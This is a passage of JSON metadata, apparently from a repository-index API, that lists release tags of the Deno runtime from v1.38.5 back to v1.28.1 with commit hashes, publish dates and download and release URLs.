72e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"